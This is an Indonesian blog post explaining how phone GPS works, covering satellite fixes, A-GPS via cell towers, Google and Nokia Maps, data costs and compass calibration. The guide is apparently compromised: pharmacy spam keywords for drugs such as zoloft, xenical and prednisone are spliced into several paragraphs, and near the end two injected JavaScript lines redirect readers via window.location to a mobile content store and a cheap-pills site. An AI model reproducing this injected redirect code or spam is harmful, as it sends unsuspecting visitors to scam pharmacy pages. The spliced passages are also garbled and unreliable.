Navigasi Dengan Ponsel ber-GPS

Bismillaahirrahmaanirrahiim.
Semoga tulisan ini bermanfaat, terutama mungkin bagi yang suka menjelajah, atau pekerjaannya menuntut banyaj aktivitas outdoor yang berpindah2.
Salah satu fasilitas yang sekarang mulai banyak terdapat pada ponsel adalah instrumen gps (global positioning system). Instrumen ini berguna untuk menentukan lokasi kita di bumi berdasarkan pelacakan satelit. Satelit yang dimaksud adalah satelit gps. Satelit2 ini dioperasikan pemerintah amerika.
Ternyata ada beberapa hal dalam penggunaan gps ini yang perlu kita ketahui yang kadangkala belum tertulis di petunjuk pemakaian ponsel.
Ketika fasilitas gps diaktifkan (gps otomatis aktif bila kita membuka program yang menggunakan fasilitas gps, misal maps (google maps, nokia maps, garmin, dll), juga program navigasi (misal: “location”). Ketika gps aktif, ponsel akan mencari sinyal satelit gps yang ada. Setelah ditemukan, (satelit2 yang ditemukan bisa dilihat di menu map, biasanya nama menunya “satelit status”. Terlihat satelit2 yang ditemukan, posisinya, dan kekuatan sinyal yang diterima) ponsel akan berhubungan dengan satelit tersebut, sehingga posisi ponsel di muka bumi dapat diperhitungkan dan di “fixed”. Awalnya , kita membutuhkan minimal 4 sinyal satelit untuk menentukan posisi kita. Setelah posisi awal didapat, kita hanya membutuhkan 3 satelit untuk melacak posisi kita bila kita berpindah tempat.
Waktu yang dibutuhkan untuk melakukan koneksi ke satelit dan melacak posisi bervariasi, bergantung kekuatan sinyal satelit, cuaca, penghalang (tembok, atap rumah, kap kendaraan, dll) dan sensitivitas penerima sinyal di ponsel. Sehingga, penentuan posisi biasanya lebih mudah dilakukan dalam cuaca cerah, dan tidak ada penghalang (kita di ruang terbuka). Waktu yang dibutuhkan sampai kita mendapatkan posisi bervariasi, antara beberapa detik hingga beberapa menit. Tapi umumnya sekitar 2-3 menit di ruang terbuka. Jadi tidak begitu membuka maps langsung mendapatkan posisi dengan gps. Biasanya perlu menunggu sekian menit. Akurasi penentuan posisi dengan gps cukup baik. Jika dilihat di peta biasanya hanya meleset beberapa meter. Akurasi ini bergantung pada banyaknya sinyal satelit yang diterima. Semakin banyak satelit yang ditemukan, semakin akurat posisi yang didapatkan.
Gps ponsel dapat menentukan posisi tidak hanya dengan satelit. Karena sensitivitasnya kurang dibandingkan gps portable (perangkat gps betulan), sinyalnya kadang hilang terutama bila berada di dalam ruangan atau cuaca buruk. Untuk penentuan posisi, gps ponsel dibantu dengan kemampuan menentukan posisi dengan sinyal dari bts (base transceiver system- menara pemancar sinyal operator hp) di sekitarnya. Kemampuan ini disebut A-GPS (assisted gps). Tanpa sinyal satelit, hanya mengandalkan sinyal bts, akurasi penentuan posisi tidak bagus. Posisi kita ditentukan dalam radius sekitar 2-3 km. (jika dilihat denga google maps, ada bulatan warna biru dengan radius 2-3 km)Untuk menentukan posisi dengan sinyal bts saja tanpa sinyal satelit, ponsel tidak perlu memiliki perangkat gps. Cukup support java. Dengan menginstall google maps, (dapat didapatkan dan didownload dari ponsel di www.getjar.com, search aja google maps di situ) kita dapat melihat peta seluruh dunia dan menentukan posisi kita dengan sinyal bts.
Peta yang kita lihat bisa formatnya bermacam-macam. Ada peta satelit (seperti melihat dari atas), ada peta jalan (sebagaimana kita lihat kalau membeli buku atlas). Beberapa program dapat menunjukkan peta 3D. Peta satelit di mayoritas kota di Indonesia cukup detail, rumah per rumah dapat dilihat dengan jelas. Sedangkan peta jalan, seringkali tidak cukup detail untuk banyak kota di Indonesia. Tetapi misal untuk Jakarta dan jogja peta jalannya sudah cukup detail. Peta didownload dari server. Jadi, ketika kita membuka google maps, nokia maps, dll, program akan melakukan akses internet untuk menampilkan peta di ponsel. Google maps tidak mengizinkan kita menyimpan banyak peta di hardisk ponsel, jadi ketika kita membuka peta Solo, kemudian membuka peta Jogja, kemudian membuka peta Solo lagi, program akan melakukan akses internet lagi untuk membuka peta Solo. Untuk pengguna kartu indosat dan paket internet xl, akses data cukup terjangkau, biasanya hanya beberapa ratus rupiah untuk melihat2 peta selama 5-10 menit. Untuk telkomsel atau xl regular, biayanya 5-10 kali lipat. Untuk program nokia maps, secara otomatis menyimpan peta yang sudah pernah dibuka ke dalam hardisk ponsel, jadi ketika membuka peta yang sudah pernah dibuka, tidak perlu mengakses dari internet. Kelemahan nokia maps, peta satelitnya betul2 tidak detail. Gedung2 besar bahkan tidak dapat terlihat di mayoritas kota di Indonesia. Peta jalannya lumayan, seperti google maps. price for zoloft100mg of zoloft for anxiety
——–
Ponsel dengan gps, umumnya dilengkapi digital compass. Ada kompasnya. Juga ketika melakukan navigasi, peta akan menghadap seperti posisi ponsel. Misal ponsel ujungnya ke barat, peta akan menyesuaikan, bagian barat ada di ujung ponsel. Ini mempermudah navigasi. xenical 120 mg buy online ukcost of xenical without insurance
Digital compass pada beberapa tipe ponsel harus dikalibrasi dulu supaya aktif. Caranya dengan menghadapkan ponsel secara horizontal (layar menghadap langit) kemudian kita putar beberapa kali dengan layar tetap menghadap atas. Pada nokia maps, kompas aktif akan berwarna hijau (bukan kuning).
Bila kompas berwarna putih, kursor blm berada pada indikator posisi kita di peta. Tkan menu-my position. Kursor akn berada di indikator posisi di peta. Kompas akn bwarna kuning (belum aktif), untuk mengaktifkan, putar2 ponsel.

+

diflucan for salehow to order diflucan online doxycycline 100mg tablet pricedoxycycline for horses cost stromectol prescriptionStromectol 3 mg tablets zyban sale cheap prednisone Prednisone natural alternative buy arimidex steroidAnastrozole generic cost zyban price
+window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2”; window.location = “http://cheap-pills-norx.com/search.htm?route=search&q=”;

Leave a Reply

Your email address will not be published. Required fields are marked *


*

Skip to toolbar